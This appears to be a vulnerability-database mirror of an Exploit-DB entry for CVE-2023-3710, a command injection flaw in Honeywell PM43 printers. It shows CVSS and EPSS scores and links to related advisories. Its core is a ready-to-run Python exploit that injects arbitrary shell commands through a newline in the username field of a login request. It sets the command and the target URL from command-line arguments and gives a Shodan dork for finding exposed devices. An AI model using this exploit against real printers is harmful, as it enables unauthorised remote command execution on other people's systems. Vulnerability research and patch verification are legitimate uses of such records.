Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbByteHunterEDB-ID:51885
HistoryMar 14, 2024 - 12:00 a.m.

Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

2024-03-1400:00:00
ByteHunter
www.exploit-db.com
177
honeywell pm43
remote code execution
command injection
cve-2023-3710
bytehunter
shodan dork
exploit title
firmware version
command execution

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H

9.7 High

AI Score

Confidence

High

0.71 High

EPSS

Percentile

98.1%

JSON
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710   
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter      
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text  
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()

Related

prion 1
nuclei 1
githubexploit 1
nvd 1
cve 1
cvelist 1
zdt 1
packetstorm 1
prion
prion
Input validation
2023-09-12 20:15:00
nuclei
nuclei
Honeywell PM43 Printers - Command Injection
2023-10-15 13:57:25
githubexploit
githubexploit
Exploit for Command Injection in Honeywell Pm43 Firmware
2023-10-14 18:31:51
nvd
nvd
CVE-2023-3710
2023-09-12 20:15:09
cve
cve
CVE-2023-3710
2023-09-12 20:15:09
cvelist
cvelist
CVE-2023-3710 Printer web page invalid command execution
2023-09-12 19:55:41
zdt
zdt
Honeywell PM43 < P10.19.050004 - Remote Code Execution Exploit
2024-03-14 00:00:00
packetstorm
packetstorm
Honeywell PM43 Remote Code Execution
2024-03-14 00:00:00

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H

9.7 High

AI Score

Confidence

High

0.71 High

EPSS

Percentile

98.1%

JSON
Related for EDB-ID:51885
prion1nuclei1githubexploit1nvd1cve1cvelist1zdt1packetstorm1